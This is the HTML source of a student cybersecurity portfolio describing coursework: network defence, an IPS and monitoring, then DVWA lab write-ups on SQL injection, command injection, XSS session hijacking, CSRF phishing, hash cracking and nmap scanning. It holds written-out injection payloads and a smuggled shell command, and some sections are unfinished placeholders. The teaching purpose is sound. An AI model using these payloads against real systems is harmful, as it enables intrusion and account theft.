          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
